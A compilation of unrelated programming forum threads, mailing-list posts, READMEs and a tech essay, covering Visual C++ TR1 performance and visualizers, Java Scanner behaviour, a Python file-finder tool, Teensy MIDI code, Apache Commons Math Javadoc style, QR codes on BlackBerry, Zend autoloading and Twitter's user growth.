    #include <algorithm>
    #include <cstdio>
    #include <cstring>
    #include <vector>
    #include <windows.h>

    struct timer {
        const char* msg;
        DWORD start;
        timer(const char* msg) : msg(msg), start(GetTickCount()) { }
        ~timer() {
            DWORD end = GetTickCount();
            std::fprintf(stderr, "%s: %u\n", msg, end - start);
        }
    };

    int main() {
        typedef char elem_t;
        static const int N = 100000, K = 10000;
        //getchar();
        {
            timer t("vector");
            for (int k = 0; k < K; ++k) {
                std::vector<elem_t> v(N);
                v.push_back(0);
            }
        }
        {
            timer t("fill + memmove");
            for (int k = 0; k < K; ++k) {
                elem_t* a1 = new elem_t[N];
                std::fill(a1, a1 + N, 0);
                elem_t* a2 = new elem_t[N * 2];
                std::memmove(a2, a1, N * sizeof(elem_t));
                delete[] a1;
                a2[N] = 0;
                delete[] a2;
            }
        }
        {
            timer t("fill + memcpy");
            for (int k = 0; k < K; ++k) {
                elem_t* a1 = new elem_t[N];
                std::fill(a1, a1 + N, 0);
                elem_t* a2 = new elem_t[N * 2];
                std::memcpy(a2, a1, N * sizeof(elem_t));
                delete[] a1;
                a2[N] = 0;
                delete[] a2;
            }
        }
        {
            timer t("memset + memcpy");
            for (int k = 0; k < K; ++k) {
                elem_t* a1 = new elem_t[N];
                std::memset(a1, 0, N * sizeof(elem_t));
                elem_t* a2 = new elem_t[N * 2];
                std::memcpy(a2, a1, N * sizeof(elem_t));
                delete[] a1;
                a2[N] = 0;
                delete[] a2;
            }
        }
    }

This is compiled with:

> cl /EHsc /Ox /Zi /D_SECURE_SCL=0 /D__STDC_WANT_SECURE_LIB__=0

When run, it gives the following results:

vector: 1344
fill + memmove: 422
fill + memcpy: 422
memset + memcpy: 437

From what you say, I would expect vector to be as fast as fill + memmove (since that's pretty much what it does). Curiously, these numbers differ with varying K and N; in general, smaller N makes the difference more pronounced, while larger N makes it less noticeable. For example, for N=10000 & K=1000000 I get:

vector: 11391
fill + memmove: 2343
fill + memcpy: 2313
memset + memcpy: 2328

And for N=1000000 & K=1000, it's:

vector: 5000
fill + memmove: 4938
fill + memcpy: 4937
memset + memcpy: 4938

Which makes more sense. I'm more interested in cases with N<100000, since that's where it is going to be in most practical cases. From these numbers, it seems that the issue is not in the filling/copying code itself, but in some checks which remain there even with _SECURE_SCL disabled.

> I'd like to have <cstdint>, but shared_ptr is about a bazillion times more vital.
<cstdint> is by far the most important of all TR1 compat headers, and also the simplest; why not have it and forgo the rest?

I'm disappointed at stdint/cstdint being missing, too. I hate typing unsigned __int64 in one-off programs, and I've never seen a major project that didn't have to have its own typedefs for sized types. Lots of fun when they collide. Much of the stuff in TR1 section 8 I could do without, but stdint.h I want. I suppose not having the extra printf() size specifiers would be a bummer, though.

Well, for most practical purposes, we've got a de facto standard by now:

sizeof(short)==2
sizeof(int)==4
sizeof(long long)==8

At least I'm not aware of any still-relevant compiler for which this doesn't hold (I know int was 2 bytes in 16-bit DOS days, but these are hardly relevant today). Even so, int32_t is so much more preferable...

Aha - it's good to know that memmove_s(), memmove(), and memcpy() are basically indistinguishable, and the same for fill() and memset(). Thanks for the test case - profiling indicates that the vector test spends 76% of its time in vector<T>::_Construct_n(). I'll file a bug.

> <cstdint> is by far the most important of all TR1 compat headers,
> and also the simplest; why not have it and forgo the rest?

The "which parts of TR1 should we ship" decision was made at the coarsest-grained level of Boost/C99/Math.

[Phaeron] > I'm disappointed at stdint/cstdint being missing, too.

There's always boost/cstdint.hpp.

> I hate typing unsigned __int64 in one-off programs

VC accepts "unsigned long long".

> and I've never seen a major project that didn't have to have
> its own typedefs for sized types. Lots of fun when they collide.

Namespaces!

> At least I'm not aware of any still-relevant compiler for which this doesn't hold

"ILP64" platforms make int, long, long long, and void * all 64 bits. I'm not sure which platforms actually implement ILP64.

> There's always boost/cstdint.hpp.
I tend to compile lots of little test programs with cl.exe for which bringing in Boost is, um, a bit much.

> VC accepts "unsigned long long".

That's even longer!

You're welcome. You can probably imagine my amusement, though, that a developer on the VC++ Libraries team used reverse-engineered docs from an external source for the VC++ debugger. Go bug the debugger team and ask them to write better docs! Then tell them to release them to us. :)

> I've written visualizers for almost every TR1 type (I am secretly proud of how shared_ptr's visualizer switches between "1 strong ref" and "2 strong refs").

How about boost::function? ;)

> I tend to compile lots of little test programs with cl.exe for which bringing in Boost is, um, a bit much.

At home, I drop Boost into VC\PlatformSDK\Include and VC\PlatformSDK\Lib, so I can use it without any /I switches. (I could also have used VC\include and VC\lib.) This is, of course, entirely unsupported - as a general rule you shouldn't perform brain surgery in Program Files - but it works entirely well.

>> VC accepts "unsigned long long".
> That's even longer!

The typedefs I use at home are uc_t, us_t, ul_t, and ull_t. :-)

> You're welcome. You can probably imagine my amusement, though,
> that a developer on the VC++ Libraries team used reverse-engineered
> docs from an external source for the VC++ debugger.

The sad thing is that - to my knowledge - your docs are the most complete ones in existence. We don't have *any* internal docs for the visualizer, beyond the comments in autoexp.dat.

> How about boost::function? ;)

I visualize tr1::function too; however, pointers-to-bases are a "brick wall" to visualizers, so I can only preview them with "empty" or "full". Vaguely speaking, _Impl->_Callee._Object stores the functor, but there's no way to get that into the preview. For the same reason, shared_ptr deleters are not visualizable. When this happens, I provide [actual members] so you can dig into the representation; the foo,!
trick isn't widely known, and is less convenient anyways.

Yesterday, I checked in an enhanced regex visualizer. While basic_regex looks like it stores a plain string, it actually stores a finite state machine, which is completely un-visualizable. So, I added a data member named _Visualization to basic_regex that stores the string from which it was constructed, which we can use to preview the regex. By default, this is enabled in debug and disabled in ship (we'll fall back to a significantly less useful preview), although you can override this by defining _ENHANCED_REGEX_VISUALIZER (0 in debug would remove the overhead of storing the string; 1 in ship would make debugging easier). While basic_regex is much more heavyweight than a simple string, I didn't want to make ship any slower without people asking for it.

Hopefully, you will be pleasantly surprised by the number of TR1 types that I visualize, and the comprehensiveness of their visualizers. weak_ptrs can be previewed with "expired", regex_iterators and regex_token_iterators have useful previews and children, and even the return value of bind() will be visualized (this hasn't been checked in yet, pending a bind() fix, but STL functors like plus<T>() and the like will also get visualizers, since that makes bind() visualizers much prettier).

I am also disappointed to not see stdint. Having to make typedefs in portable code gets old quick. stdint and inttypes are both very simple; is there no way for them to be included?

Agreed. cstdint is necessary, not to mention ridiculously easy to implement. There's no excuse not to ship a standard header file which consists of nothing but a small set of extremely useful typedefs.

Since we are talking about visualizers, does anyone else have this problem - on Vista w/ VC2005 SP1 (w/ Vista update), no [Visualizer]s seem to work at all. My [AutoExpands] work properly, but I cannot even get an STL container of ints to visualize as you would expect (e.g.
I get {_Myfirst=0x003d4ea0 _Mylast=0x003d4eb4 _Myend=0x003d4eb8 } instead of {[2](x,y)}). Btw, this is on Visual Studio 2005 Standard, though I can't see why that would make a difference.

> I visualize tr1::function too; however, pointers-to-bases are a "brick wall" to visualizers, so I can only preview them with "empty" or "full". Vaguely speaking, _Impl->_Callee._Object stores the functor, but there's no way to get that into the preview.

> I am also disappointed to not see stdint.

I'd like to have cstdint in VC9 TR1 too, but remember the opportunity cost. If we had an extra day, week, or month to work on TR1, I'd want us and Dinkumware to look at regex perf.

[mochi] > on Vista w/ VC2005 SP1 (w/ vista update), no [Visualizer]s seem to work at all.

On my dev box (Server 2003 SP2 with VC8 SP1 Team Suite), visualizers work intermittently, which mystifies me. I had installed and uninstalled another edition of VC8 before, but hadn't done anything else unusual to that computer. (I'm 90% sure that my ordinary development work doesn't interact with the regular installation.) I really ought to nuke and pave that machine, but I'm waiting to get a quad-core.

Function pointers, okay - given a tr1::function<FT>, if it holds a function pointer, that's of type FT *. That's a good idea. But bind expressions, no - the type of a bind expression is highly variable, depending on more than its signature.

regex's representation was almost completely opaque (except for the flags with which it was constructed), so the enhanced regex visualizer is rather valuable. I could imagine it being hard to track down the string from which a regex was constructed (especially in the case of constructing a regex from input iterators), even though the usual case is to have a const regex constructed from a string literal. tr1::function's representation, on the other hand, is obnoxious to pick through the first time, but does contain all of the information you want.
So the need for an enhanced visualizer is less (although it sure would be convenient). I'll take a look at how simple it would be to add a "stores a function pointer" bool to tr1::function, although I suspect that it would require adding some overloads. Anything that could destabilize the implementation would be Bad. (regex's _Visualization didn't need any new overloads, so there was no danger of breaking something else. At worst, we'd forget to update the _Visualization when we should.)

Can we use MFC/TR1 for native/win32 programming and not MFC?

[Dave] > Can we use MFC/TR1 for native/win32 programming and not MFC?

I don't understand your question, can you clarify it?

Hey - everyone who says Microsoft needs to provide stdint.h: there's a public domain version available (from the MinGW toolset). It required some tweaks for my use (to make the 64-bit stuff work with VC6 - I don't remember if changes were needed for any other MS compiler version). I know that MS should provide this with the compiler (and I sure have no idea why they don't), but until they decide to, you can have your portability in this small area with little in the way of maintainability headaches, since it's not interdependent on other bits of the library - it's just a bunch of typedefs and macros.

- I mean, is TR1 a specific feature for MFC users? If not, why did you distribute it along with the MFC update?
- After compiling with this new patch, is distribution of the updated CRT enough? No new libraries needed to distribute?

Thanks in advance

> Soma announces on his blog support for TR1 in Visual Studio 2008. You can download the beta.

You are right about my first question ("the beta reference_wrapper..."). I didn't investigate deep enough.
I jumped to conclusions too fast when I saw this error:

1>c:\users\hzhang\documents\visual studio 2008\projects\test\test.cpp(35) : error C2582: 'operator =' function is unavailable in 'std::tr1::reference_wrapper<_Ty>'

Even though I cannot find a definition of 'operator =' in the source, I could assume that the trivial copy assignment operator bit-copies the internal pointer-to-type. Thank you.

This stuff is awesome, and really the only reason I want to upgrade to VC9 (a real, working, debuggable shared_ptr class without having to install the giant mess that is boost). Having said that, something still puzzles me:

    #include <iostream>
    #include <functional>
    using namespace std;
    using namespace std::tr1;

    void f() { cout << "f" << endl; }
    void g() { cout << "g" << endl; }

    typedef int* const cpi;
    typedef void (*const cpf)();

    int main() {
        int a = 100, b = 120;
        cpi cpia = &a;
        cpi cpib = &b;
        cpf cpf1 = &f;
        cpf cpf2 = &g;
        //cpia = cpib; //can't do this, we already know
        //cpf1 = cpf2; //can't do this either, we all know
        reference_wrapper<cpi> ra(cpia), rb(cpib);
        reference_wrapper<cpf> rf(cpf1), rg(cpf2);
        rf();
        //rf = rg; //can we do this? the compiler won't
        *ra += 1;
        cout << a << " ";
        ra = rb; //we can do this, the compiler does it
        *ra += 2;
        cout << b << endl;
    }

Another bug, I'll file it.

Hello, I'm a little late to the game, but does the feature pack contain new redist MSIs for the CRT dlls? - Kim

Can these libraries be used with Smart Device (Windows Mobile) projects?

While playing with the feature pack I found a performance characteristic that looks strange to me. A simple A*-example app needs to test whether it has seen an unsigned long long before - any set-style class can handle that:

    std::set<unsigned long long> vals;
    ...
    while(...)
    {
        unsigned long long val = ...
        if (vals.insert(val).second)
            //not yet seen
        else
            //seen
        ...
Since stdext::hash_set and std::tr1::unordered_set (and mingw gcc 3.4.5 __gnu_cxx::hash_set) share this interface, I made a perf comparison (for the mingw one I had to implement the hash function). The results are strange (I just used Task Manager to measure CPU time):

Using std::set, mingw and VS 2008 keep pace:
vs: 36 sec
mingw: 35 sec

Using __gnu_cxx::hash_set shows the expected drop in computing time: 28 sec. But the two VS2008 hash sets use a lot more computing time than before, which renders them rather useless:
stdext::hash_set: 50 sec
std::tr1::unordered_set: 53 sec

Is there a way to address this? Thanks, gulli

[Kim Gräsman] > I'm a little late to the game, but does the feature
> pack contain new redist MSIs for the CRT dlls?

Yes; otherwise, end users would be unable to run TR1-powered applications. VCRedist has also been updated (although VC recommends against its use).

[mjf] > Can these libraries be used with Smart Device
> (Windows Mobile) projects?

Anything that can use VC9's STL can use TR1.

[gulli] > flaw in hash_set and unordered_set performance

I will investigate.

I have filed a bug about our hash_set/unordered_set performance. (I also found an infinite loop bug in <random> while I was at it.)
http://blogs.msdn.com/vcblog/archive/2008/01/08/q-a-on-our-tr1-implementation.aspx
According to the javadoc for java.util.Scanner.skip:

"Skips input that matches the specified pattern, ignoring delimiters."

    import java.util.Scanner;

    public class Example {
        public static void main(String[] args) {
            Scanner sc = new Scanner("Hello World! Here 55");
            String piece = sc.next();
            sc.skip("World");       // Line A throws NoSuchElementException, vs.
            sc.skip("\\sWorld");    // Line B works!
            sc.findInLine("World"); // Line C works!
        }
    }

You left out the next sentence of the method's description, which reads (emphasis mine): "This method will skip input if an *anchored* match of the specified pattern succeeds." So Scanner is not so much "ignoring" the delimiter as simply trying to match the specified regular expression without taking the delimiter into account. In other words, the space before World is not treated as a delimiter by skip(), but merely as part of the input that it is trying to match against.
https://codedump.io/share/AGN2WIkxsJrS/1/scannerskip-documentation-concerning-delimiters
ff

About

ff is a tool for finding files in the filesystem.

NOTE: ff is in the early stages of development, expect things to break and syntax to change.

Summary

ff lets you find files in the filesystem by querying file metadata. Its scope is similar to find(1) and fd(1), but it tries to be more accessible and easier to use than find, and more versatile and powerful than fd. It is written in Python >= 3.6.

Features

- Search by file attributes.
- Search in a wide variety of file metadata.
- Simple yet powerful expression syntax.
- Flexible output options.
- Flexible sort options.
- Extendable by user plugins.
- Parallel search and processing.
- Usable in scripts with a Python API.

Examples

Installation

To build and install ff, simply type:

$ python setup.py install

or

$ pip install find-ff

This installs the Python sources, the ff script, the man page and a set of plugins.

Python API

You can use ff's query capabilities in your own scripts:

    from libff.search import Search

    for entry in Search("type=f git.tracked=yes", directories=["/home/user/project"], sort=["path"]):
        print(entry["relpath"])

Developing plugins and debug mode

There is a template for new plugins to start from (plugin_template.py) with exhaustive instructions and comments, so you can develop plugins for your own needs. Useful in that regard is ff's debug mode. It can be activated by executing the libff module:

$ python -m libff --debug info,cache ...

Debug mode produces lots of messages, which can be limited to certain categories using the --debug category1,category2,... option. On top of that, debug mode activates many internal checks using assert(). Therefore, it is advisable to use debug mode during plugin development.
https://libraries.io/pypi/find-ff
Forgive my ignorance in electronics. I know (next to) nothing about all this. I have however altered some example code to do what I want it to do. It works great! This is a simple MIDI sketch that uses 5 buttons and a toggle switch to send program changes. When the toggle switch is enabled, it changes what program changes are sent, thus giving me 10 different program changes. I have the on-board LED turning on when I turn on the toggle switch, letting me know I'm in the 2nd bank of programs.

My question is, do I need some sort of resistor when using a regular LED? I have some leftover LEDs from an Arduino UNO kit that I got about a year ago and never used. They have two long leads on them, one shorter than the other. Can I just connect the ground and pin 13 to the LED and make this work? I appreciate any help you can give this novice. I'm using a Teensy 3.2. Here is the code I've hobbled together. Thanks.

/* Simple Teensy DIY USB-MIDI controller.
   Created by Liam Lacey, based on the Teensy USB-MIDI Buttons example code.

   Contains 8 push buttons for sending MIDI messages, and a toggle switch
   for setting whether the buttons send note messages or CC messages.

   The toggle switch is connected to input pin 0, and the push buttons are
   connected to input pins 1 - 8.

   You must select MIDI from the "Tools > USB Type" menu for this code to compile.

   To change the name of the USB-MIDI device, edit the STR_PRODUCT define in the
   /Applications/Arduino.app/Contents/Java/hardware/teensy/avr/cores/usb_midi/usb_private.h
   file. You may need to clear your computer's cache of MIDI devices for the
   name change to be applied.

   See for the Teensy MIDI library documentation.
*/

//The number of push buttons. I've changed this to use just 5 buttons instead of 8.
//Had to skip pins 2, 4 and 6 due to poor soldering skills. lol.
#include <Bounce.h>

const int ledPin = 13;
const int NUM_OF_BUTTONS = 8;
const int MIDI_CHAN = 10;
const int DEBOUNCE_TIME = 15;

Bounce buttons[NUM_OF_BUTTONS + 1] = {
    Bounce (0, DEBOUNCE_TIME),
    Bounce (1, DEBOUNCE_TIME),
    Bounce (2, DEBOUNCE_TIME),
    Bounce (3, DEBOUNCE_TIME),
    Bounce (4, DEBOUNCE_TIME),
    Bounce (5, DEBOUNCE_TIME),
    Bounce (6, DEBOUNCE_TIME),
    Bounce (7, DEBOUNCE_TIME),
    Bounce (8, DEBOUNCE_TIME)
};

const int MIDI_MODE_ONE = 0;
const int MIDI_MODE_TWO = 1;

//Variable that stores the current MIDI mode of the device (what type of messages the push buttons send).
int midiMode = MIDI_MODE_ONE;

//Arrays that store the exact note and CC messages each push button will send.
const int MIDI_ONE_NUMS[NUM_OF_BUTTONS] = {11, 0, 12, 0, 13, 0, 14, 15};
const int MIDI_ONE_VALS[NUM_OF_BUTTONS] = {127, 127, 127, 127, 127, 127, 127, 127};
const int MIDI_TWO_NUMS[NUM_OF_BUTTONS] = {1, 0, 2, 0, 3, 0, 4, 5};
const int MIDI_TWO_VALS[NUM_OF_BUTTONS] = {127, 127, 127, 127, 127, 127, 127, 127};

//const int MIDI_NOTE_NUMS[NUM_OF_BUTTONS] = {10, 41, 42, 43, 36, 37, 38, 39};
//const int MIDI_NOTE_VELS[NUM_OF_BUTTONS] = {110, 110, 110, 110, 110, 110, 110, 110};
//const int MIDI_CC_NUMS[NUM_OF_BUTTONS] = {24, 25, 26, 27, 20, 21, 22, 23};
//const int MIDI_CC_VALS[NUM_OF_BUTTONS] = {127, 127, 127, 127, 127, 127, 127, 127};

//==============================================================================
//The setup function. Called once when the Teensy is turned on or restarted.
void setup() {
    // Configure the pins for input mode with pullup resistors.
    // The buttons/switch connect from each pin to ground. When
    // the button is pressed/on, the pin reads LOW because the button
    // shorts it to ground.
    // When released/off, the pin reads HIGH
    // because the pullup resistor connects to +5 volts inside
    // the chip.
    pinMode(ledPin, OUTPUT);
    for (int i = 0; i < NUM_OF_BUTTONS + 1; i++) {
        pinMode(i, INPUT_PULLUP);
    }
}

//==============================================================================
//The loop function. Called over-and-over once the setup function has been called.
void loop() {
    // Update all the buttons/switch. There should not be any long
    // delays in loop(), so this runs repetitively at a rate
    // faster than the buttons could be pressed and released.
    for (int i = 0; i < NUM_OF_BUTTONS + 1; i++) {
        buttons[i].update();
    }

    // Check the status of each push button
    for (int i = 0; i < NUM_OF_BUTTONS; i++) {
        // Check each button for "falling" edge.
        // Falling = high (not pressed - voltage from pullup resistor) to low (pressed - button connects pin to ground)
        if (buttons[i + 1].fallingEdge()) {
            if (midiMode == MIDI_MODE_ONE)
                usbMIDI.sendProgramChange(MIDI_ONE_NUMS[i], MIDI_CHAN, 0);
                //digitalWrite(ledPin, HIGH); // set the LED on
                //delay(1000); // wait for a second
            //}
            else
                usbMIDI.sendProgramChange(MIDI_TWO_NUMS[i], MIDI_CHAN, 0);
        }
        // Check each button for "rising" edge
        // Rising = low (pressed - button connects pin to ground) to high (not pressed - voltage from pullup resistor)
    } //for (int i = 0; i < NUM_OF_BUTTONS; i++)

    // Check the status of the toggle switch, and set the MIDI mode based on this.
    if (buttons[0].fallingEdge()) {
        midiMode = MIDI_MODE_ONE;
        digitalWrite(ledPin, HIGH); // set the LED on
        //delay(200);
    }
    else if (buttons[0].risingEdge()) {
        midiMode = MIDI_MODE_TWO;
        digitalWrite(ledPin, LOW); // set the LED off
        //delay(200);
    }

    // MIDI Controllers should discard incoming MIDI messages.
    while (usbMIDI.read()) {
        // ignoring incoming messages, so don't do anything here.
    }
}
https://forum.pjrc.com/threads/62980-LED-light-on-pin-13?s=0c52b110a8a2dcfd4ffbaec1ae22661a&p=252301&mode=linear
On 31 August 2012 16:51, Sébastien Brisard <sebastien.brisard@m4x.org> wrote:
> Hi sebb,
>
> 2012/8/31 sebb <sebbaz@gmail.com>:
>> On 31 August 2012 14:52, Sébastien Brisard <sebastien.brisard@m4x.org> wrote:
>>> Hi Gilles,
>>>
>>> 2012/8/31 Gilles Sadowski <gilles@harfang.homelinux.org>:
>>>> Hello Sébastien.
>>>>
>>>>> Author: celestin
>>>>> Date: Fri Aug 31 03:12:16 2012
>>>>> New Revision: 1379270
>>>>>
>>>>> URL:
>>>>> Log:
>>>>> MATH-849: changed boundary case x = 8.0 in double Gamma.logGamma(double).
>>>>>
>>>>> Modified:
>>>>> commons/proper/math/trunk/src/main/java/org/apache/commons/math3/special/Gamma.java
>>>>>
>>>>> Modified: commons/proper/math/trunk/src/main/java/org/apache/commons/math3/special/Gamma.java
>>>>> URL:
>>>>> ==============================================================================
>>>>> --- commons/proper/math/trunk/src/main/java/org/apache/commons/math3/special/Gamma.java (original)
>>>>> +++ commons/proper/math/trunk/src/main/java/org/apache/commons/math3/special/Gamma.java Fri Aug 31 03:12:16 2012
>>>>> @@ -222,9 +222,9 @@ public class Gamma {
>>>>>      * Returns the value of log Γ(x) for x > 0.
>>>>>      * </p>
>>>>>      * <p>
>>>>> -    * For x < 8, the implementation is based on the double precision
>>>>> +    * For x ≤ 8, the implementation is based on the double precision
>>>>
>>>> My personal taste would be to write this as
>>>> ---
>>>> {@code x <= 8}
>>>> ---
>>>> [As I'm not an HTML parser,
>>>>
>>> I'm a bit disappointed by your poor parsing capabilities ;-)
>>>
>>>> it always takes me a few moments to figure out a
>>>> sequence such as "x < 8", while it is easier to focus on the central part
>>>> of "{@code x <= 8}".]
>>>>
>>>> So, if nobody disagrees, this could become a formatting rule. [The rationale
>>>> (to be included in the document you proposed to create) would be that
>>>> Javadoc comments should be as easy as possible to read in their source form,
>>>> for the developer's sake.]
>>>>
>>> Yeah, and it gets worse when I had to find a workaround for the
>>> decimal point not being interpreted as the end of the first sentence:
>>> I ended up with something like
>>> Returns the value of 1 / Γ(1 + x) - 1 for -0.5 ≤ x ≤
>>> 1.5. In case you wondered, &#46; is simply '.'. This is ugly, I
>>> agree.
>>>
>>> I was thinking this very morning of something like "HTML tags are
>>> allowed as long as reading the source file is still reasonably easy".
>>> I'm quite happy with a more radical approach, like "HTML text
>>> formatting tags should be avoided as much as possible. Paragraph
>>> formatting (<p>, <li>, <pre>, ...) is allowed". Note that it has not
>>> been applied consistently in CM yet: in some parts, formulae are
>>> formatted with HTML tags, in other parts, it's pure {@code }. I
>>> contributed to this mess :-(
>>> As sebb mentions, {@code } prevents *any* formatting, but this would
>>> not really be an issue. If needed, we can use <pre></pre> tags and
>>> nice text-based equations (again, tools like Maxima can help a lot),
>>> even if it looks old fashioned.
>>>
>>> I'll write something up in the JIRA ticket, so that everyone can review it.
>>
>> Rather than formal rules, maybe it would be better to treat such
>> formatting ideas as "best practice".
>>
> Yes, we do not want to frighten anyone. However, the aim of this
> document is to pick the rules (whatever you call them) we feel are
> REALLY important to improve the quality and consistency of the source.
>
>> That is, provide examples of different ways to document certain tricky
>> constructs.
>> This should make it more obvious when to choose a particular method.
>> And equally, it would show when there is no particular best choice.
>>
> Please have a look at MATH-852. I have already written one example for
> another "rule". I agree with you: examples do help.
>
>> Such examples should prove useful across all Commons components.
>>
> One step at a time!
> I know it's going to be difficult to reach
> consensus within CM. So maybe we should wait until our document is
> fairly stable. Then we can submit it to anyone to discuss...

That's my point about providing examples - there is no need to reach consensus. If the example works, use it; if not, don't.

> Sébastien
>
>>> Thanks for this suggestion,
>>>
>>> Sébastien
>>>>
>>>> Best regards,
>>>> Gilles
>>>>
>>>>> * implementation in the <em>NSWC Library of Mathematics Subroutines</em>,
>>>>> - * {@code DGAMLN}. For x ≥ 8, the implementation is based on
>>>>> + * {@code DGAMLN}. For x > 8, the implementation is based on
>>>>> * </p>
>>>>> * <ul>
>>>>> * <li><a href="">Gamma
>>>>> @@ -249,7 +249,7 @@ public class Gamma {
>>>>> return logGamma1p(x) - FastMath.log(x);
>>>>> } else if (x <= 2.5) {
>>>>> return logGamma1p((x - 0.5) - 0.5);
>>>>> - } else if (x < 8.0) {
>>>>> + } else if (x <= 8.0) {
>>>>> final int n = (int) FastMath.floor(x - 1.5);
>>>>> double prod = 1.0;
>>>>> for (int i = 1; i <= n; i++) {
>>>>>
>>>>
>>>> ---------------------------------------------------------------------
http://mail-archives.apache.org/mod_mbox/commons-dev/201208.mbox/%3CCAOGo0VbNYGKQdVNigCBtgtTQVQmK0w+JnSQdMBE9y3Rnt-2P3g@mail.gmail.com%3E
From: Nicolai Josuttis (nicolai.josuttis_at_[hidden])
Date: 2000-01-02 16:05:03

Gabriel Dos Reis wrote:
>
> Nicolai Josuttis <nicolai.josuttis_at_[hidden]> writes:
>
> Hi Nico,
>
> | As I got no feedback so far:
> | Did anybody look at it and is anybody interested?
>
> Or wasn't anybody being on holidays? :-)
>
Damned, I knew there was something, others do between Christmas and New Year :-)

> | However, one question remains:
> | - Which name should we take?
> | c_array, carray, block?
> | Is one of these names used in a library already?
>
> As Greg proposed, why not 'array'?
>
Hmmm, I am not sure because array might be widely used as an identifier already (YES, I know we have namespaces, but still I'd like to avoid conflicts if possible). carray stands for "constant array" but that means something else. How about constant_sized_array? No, just kidding, too long! The more I think about it, the more I like array.
https://lists.boost.org/Archives/boost/2000/01/1512.php
Preference panel not opening. - etienneabonn, last edited by gferreira

Every time I try to open my preferences panel I get this in the output window:

```
Traceback (most recent call last):
  File "lib/doodleDelegate.pyc", line 275, in openPreferences_
  File "lib/doodlePreferences.pyc", line 653, in __init__
  File "lib/doodlePreferences.pyc", line 1058, in setupMiscFromDefaults
AttributeError: 'NoneType' object has no attribute 'fontName'
```

and nothing happens.

Did you set a custom template preview font? Or did you remove "Lucida Grande" from your system? To solve it, execute this:

```python
from lib.tools.defaults import setDefault
setDefault("templateGlyphFontName", None)
```

Ok, thanks for reporting; will check if the font is still installed on your system in the next version. Good luck.
https://forum.robofont.com/topic/151/preference-panel-not-opening
02-13-2013 09:28 AM
Hi, any starting point for how I could encode/generate a QR code as an image to display in QML? Thanks!

02-13-2013 04:16 PM

02-13-2013 08:00 PM
You can have a look at ZXing. They have developed a QR generator/decoder for Java, but they also created a partial C++ port. Maybe it helps you a little.

02-27-2013 08:57 PM
Have you solved your problem? This is an easy way to show a QR code:

```
QrCodeView {
    id: qrCode
    data: "Your Data Here"
    preferredWidth: 300
    preferredHeight: 300
    horizontalAlignment: HorizontalAlignment.Center
}
```

You need to import

```
import bb.cascades.multimedia 1.0
import bb.multimedia 1.0
```

and add the following line to your .pro file:

```
LIBS += -lbbcascadesmultimedia
```

02-27-2013 09:51 PM

01-24-2014 07:34 AM
I'm surprised no-one mentioned there is actually a BarCodeViewer as well as other associated classes for Cascades itself... Does need 10.2 though.

06-10-2014 04:31 AM
Have you ever done this with Java QR code generation?
https://supportforums.blackberry.com/t5/Native-Development/Encode-generate-QRCode-barcode/m-p/2750351
Allow the autoloader to act as a fallback autoloader. In the case where a team may be widely distributed, or using an undetermined set of namespace prefixes, the autoloader should still be configurable such that it will attempt to match any namespace prefix. It will be noted, however, that this practice is not recommended, as it can lead to unnecessary lookups.

Allow toggling error suppression. We feel -- and the greater PHP community does as well -- that error suppression is a bad idea. It's expensive, and it masks very real application problems. So, by default, it should be off. However, if a developer insists that it be on, we allow toggling it on.

Allow specifying custom callbacks for autoloading. Some developers don't want to use Zend_Loader::loadClass() for autoloading, but still want to make use of Zend Framework's mechanisms. Zend_Loader_Autoloader allows specifying an alternate callback for autoloading.

Allow manipulation of the SPL autoload callback chain. The purpose of this is to allow specifying additional autoloaders -- for instance, resource loaders for classes that don't have a 1:1 mapping to the filesystem -- to be registered before or after the primary Zend Framework autoloader.
http://framework.zend.com/manual/1.12/en/learning.autoloading.design.html
On rising tides etc.

Thoughts on Twitter’s “growth problem”

Disclaimer: I used to work at Twitter but it has been almost a year since I left and I have no inside information into the company’s strategy, product plans or anything else. This post is based solely on my opinions as a long-time user of the product and observer of silicon valley.

There has been a lot of talk about “Twitter’s growth problem” — how it is the cause of the stock price falling (although the stock has been doing great lately), executives leaving, and pretty much everything else one can claim is “wrong” with the company. As well as much theorizing on how to “spur growth” for Twitter. I have a different take: Twitter — the product we know today — will not grow much further. It may gain another 50 million or even 100 million monthly active users (MAU) but it will definitely not grow by an order of magnitude or even get close to 1B active users. And that’s probably OK. Twitter — the broadcast medium of 140 character Tweets — has reached its local maximum. How can we know this?

- In the time that Twitter has existed, global smartphone penetration grew from below 1% in 2006 to almost 25% in 2014. In mature markets like the US, smartphone penetration is already at 66%! In the history of technology there has never been a rising tide as fast as this one. If the Twitter ship did not lift beyond 250mm MAU when the tide was rising at this unprecedented exponential rate, then it is highly unlikely that Twitter can make its ship lift now that the tide is slowing to linear growth.
- Social networking is rapidly moving away from 1:many broadcast mediums like Facebook and Twitter, where you send infrequent messages to lots of followers, to 1:few narrowcast platforms where you send tons of messages to a handful of friends. Mary Meeker captured this perfectly in her Internet Trends report (slide below.)
To use yet another meteorological analogy, if Twitter could not get further with the wind behind its back, it is highly unlikely to do so now that it’s going against the wind. I don’t think this is cause for alarm. Twitter is part of the fabric of society and isn’t going anywhere, and it has shown incredible creativity in monetizing its current userbase. But also Twitter still has fundamental assets it can leverage towards building or buying (+ reinforcing) completely new types of audiences. A big one is identity. Twitter’s @names are like DNS for entities: people, brands, organizations, parody characters. A disambiguated namespace to identify anyone or anything on the interwebs is powerful. Imagine being able to message anyone on any platform (text, Whatsapp, Snapchat etc) with their Twitter @name, without knowing their phone number or usernames in other apps. Imagine paying anyone with their @name like M-Pesa does with phone numbers. Etc. I’m confident we will see a lot more interesting things from Twitter but they may not look like the Twitter we know today. #onward
https://medium.com/@mitali/on-rising-tides-etc-f6652788ea60?source=tw-3ac9e631c2fc-1403490529503
```c
/* pixyuart fnctn 3a.c
   This works to return a value; C code used with Pixy - CMUCAM5.
   Tom Montemarano June 2014, MIT License.

   This program prints out the value of x for a chosen signature
   and data for all blocks in a frame.

   Pixy pin 1 (PP1) (rx) -- ABot P0 (tx)  -- QS p14 white
   PP4 (tx)              -- Abot P1 (rx)  -- QS p13 blue
   PP2 (+5v)             -- Abot (+5v)    -- QS (+5v)
   PP6 (gnd)             -- Abot (gnd)    -- QS (gnd)

   Run with terminal. Type sig number (1-7) <enter>
   This version only prints out the data.

   The order of Pixy words in each block is:
   43605 (sync), checksum (sum of next 5 words), signature # (1 - 7),
   x-position of centroid, y-position, width, height.
   Each word is sent LSB first.
   2 sync words in succession mean start of new frame.

   Now that I got it working I need to:
   1. Modify to also use colorcodes
*/

#include "simpletools.h"  // Include simple tools
#include "fdserial.h"

#define pybaud 86400   // This baud seems maximum, maybe too fast when getpixyx() is used in some pgms
                       // 57600 baud seems safer
#define pynumblks 14   // max nmbr blocks; make large enough to get sig of interest, but too large gets errors
